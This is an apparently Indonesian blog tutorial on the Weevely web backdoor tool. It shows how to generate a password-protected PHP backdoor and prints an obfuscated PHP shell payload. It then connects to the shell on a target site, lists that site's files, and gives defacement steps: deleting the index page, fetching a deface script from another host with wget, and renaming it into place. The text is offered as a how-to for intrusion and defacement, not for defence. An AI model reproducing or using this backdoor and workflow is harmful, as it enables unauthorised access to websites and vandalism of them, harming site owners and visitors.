Cara menggunakan weevely generate captain linux terminal
Oleh
chmood
Weevely merupakan sebuah tool web backdoor yang sangat keren,paling tidak menurut saya peribadi. Kenapa ? ya karena via console,bagi saya bisa menjalankan tool via konsole merupakan hal yang keren.heheh. Kalau tool GUI kan anak kecil aja juga bisa makeknya.heheh (becanda). Bila kita sudah berhasil upload itu backdoor, kita sudah bisa edit,membuat,download dan upload file hanya dari console terminal.keren kan??heheh.Bagi sahabat – sahabat yang memakai backbox linux,tool ini sudah tersedia. Untuk distro lainnya saya kurang tahu.
Oke langsung aja kita bahas cara pemakaiannya.
1.Cara create file backdoor.php nya.. ubah txt uploat ke tempat lain nanti tinggal wget www.target.co.org.net ato apa txt panggil jangan .txt tapi .php
root@cyborg:/home/cyborg# weevely http://www.target.org/images/site/x.php captain
sniper@sniper:~$ sudo su
[sudo] password for sniper:
root@sniper:/home/sniper# weevely generate captain
nanti di home linux : weevely.php
dan teman teman : weevely.txt atau weevely nya di ganti dengan yang di dalam web itu boleh./ pokonya format .txt dan upload di shell lain, txt tersebut = misall saya buat hasil css.txt
tampilan saya upload ke tempat lain dan ambil link nya : di shell lain
kira2 kode: seperti di bawah :)
<?php$orak = str_replace("eq","","eqsteqr_eqreqeeqpleqaceqe");$tfmp="JGM9J2NtwvdW50JzskYT0kX0NPT0tJtwRTtpZihyZXNldCgkYSk9PSdjYtwScgJiYgJGMoJGEpPjMpey";$puqp="XJyYXlftwc2xpYtw2UoJGEsJGMoJGEpLTMpKSkptwKTttwltwY2hvtwICtwc8LycuJGsuJz4nO3tw0=";$facz="RrPSdwdtwGFpbictw7ZWNotwbyAnPCcuJGsuJz4nO2V2YWwotwYmFzZTY0twX2RlY29kZtwShtwwcmVnXtw3J";$aoas="lcGxhYtw2UoYXJyYXkoJy9bXlx3PVxtwzXStw8nLCcvXHMvJyksIGFyctwmtwF5KCcnLCcrtwJytwksIGpvaW4oY";$quxd = $orak("ej", "", "ejbejaejseej6ej4_dejeejcejode");$nqju = $orak("h","","hchrhehatheh_hfuhnhchthihohn");$goeo = $nqju('', $quxd($orak("tw", "", $tfmp.$facz.$aoas.$puqp))); $goeo();?>
yang uda saya tembak :
metode bypass safe mode: admin ini sulit shelll bekerja selain menggunakan cara weevely untuk shell yang gagal bekerja
ok next
sniper@sniper:~$ sudo su
[sudo] password for sniper:
root@sniper:/home/sniper# weevely http://www.target.com/css.php captain
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.
[shell.php] [!] Error: No response
reverb $ cd ..3reg/LinuxPackage23/ch/il/do/target.com/public_html/radi
Capten.txts/123reg/LinuxPackage23/ch/il/do/target.com/public_html $ ls
OLD
Promos
Remixed
about.php
closed.php
contact.php
css
css.php
css.txt
footer.php
gallery-config.txt
giles
header.php
heartsonys
images
index.php
photos2014.php
photos2015.php
radioreverb
scripts
sitemap.xml
skin.css
sox
styleie.css
success.php
timthumb.php
untitled folder
winners.php
winners2013.php
winners2014.php
winners2015.php
@:/websites/123reg/LinuxPackage23/ch/il/do/target.com/public_html $
ini contoh saja :
cd .. : liat db atau masuk db
cd spasi nama db boleh juga
ls : spasi nama 'dan akan terlihat semua db di terminal > public_html $ dan db lain.
cat : melihat index.php atau html dll. akan tampil di termilal secara langsung cat spasi index.php langsung ada di layar terminal
rm index.php = remove / hapus index depan web
mv index.txt index.php = dan ganti dengan shell lain script kita buat
wget http://web apa/index.txt << misall script kita
script deface kita buat txt juga teman tapi kita gantung di link lain .. dan tidak tersentuh di web tersebut
buat arah depan web gini :
Semoga bermanfa’at….
Komentar